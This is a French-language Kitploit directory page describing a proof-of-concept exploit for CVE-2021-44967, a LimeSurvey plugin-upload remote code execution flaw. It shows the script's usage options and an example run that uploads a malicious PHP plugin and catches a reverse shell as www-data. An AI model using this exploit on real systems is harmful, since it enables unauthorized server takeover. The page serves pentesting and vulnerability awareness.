Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44967 — Exploit de preuve de concept pour CVE-2021-44967 permettant l'exécution de code à distance dans LimeSurvey 5.2.4 via le téléchargement de plugins malveillants, avec capacité de shell inverse. | Kitploit
Outils/GitHubGitHub/godylockz/cve-2021-44967
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingDéveloppement de Charges Utiles
GitHubgodylockz/cve-2021-44967

CVE-2021-44967

Exploit de preuve de concept pour CVE-2021-44967 permettant l'exécution de code à distance dans LimeSurvey 5.2.4 via le téléchargement de plugins malveillants, avec capacité de shell inverse.

Voir le dépôt
12il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44967 : RCE sur LimeSurvey

Description

Cette preuve de concept (POC) peut être utilisée pour exploiter CVE-2021-44967 afin de téléverser et d'exécuter un plugin PHP malveillant de LimeSurvey en tant qu'administrateur pour obtenir un reverse shell.

Une vulnérabilité d'exécution de code à distance (RCE) existe dans LimeSurvey 5.2.4 via la fonction de téléversement et d'installation des plugins, ce qui pourrait permettre à un utilisateur distant malveillant de téléverser un fichier de code PHP arbitraire.

Sévérité : 8.3 ÉLEVÉE Vecteur : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Utilisation

root@kitploit:~
usage: limesurvey_rce.py [-h] -t URL -u USERNAME -p PASSWORD [-f FILE] [--listen-ip LISTEN_IP] [--listen-port LISTEN_PORT] [--threads THREADS] [--sleep-time SLEEP_TIME] [--row ROW]
                         [--length LENGTH] [-a USERAGENT] [-x PROXY] [-v]

POC for CVE-2021-44967 (LimeSurvey RCE)

options:
  -h, --help            show this help message and exit
  -t, --url URL         LimeSurvey Target URL
  -u, --username USERNAME
                        LimeSurvey username
  -p, --password PASSWORD
                        LimeSurvey password
  -f, --file FILE       Custom PHP payload file
  --listen-ip LISTEN_IP
                        Listening IP / Interface
  --listen-port LISTEN_PORT
                        Listening Port
  -a, --useragent USERAGENT
                        User agent to use when sending requests
  -x, --proxy PROXY     HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag

Exemple

root@kitploit:~
python3 limesurvey_rce.py -t https://TARGET/ -u 'USERNAME' -p 'PASSWORD'
[*] Authenticating ...
[+] Login successful!
[*] Uploading plugin ...
[*] Activating plugin ...
[*] Starting listener and sending reverse shelll ...
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from X.X.X.X:51004.
www-data@target:/$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Testé sur LimeSurvey Community Edition version 6.6.4.

Références

  • CVE-2021-44967
  • POC original
Télécharger l’outil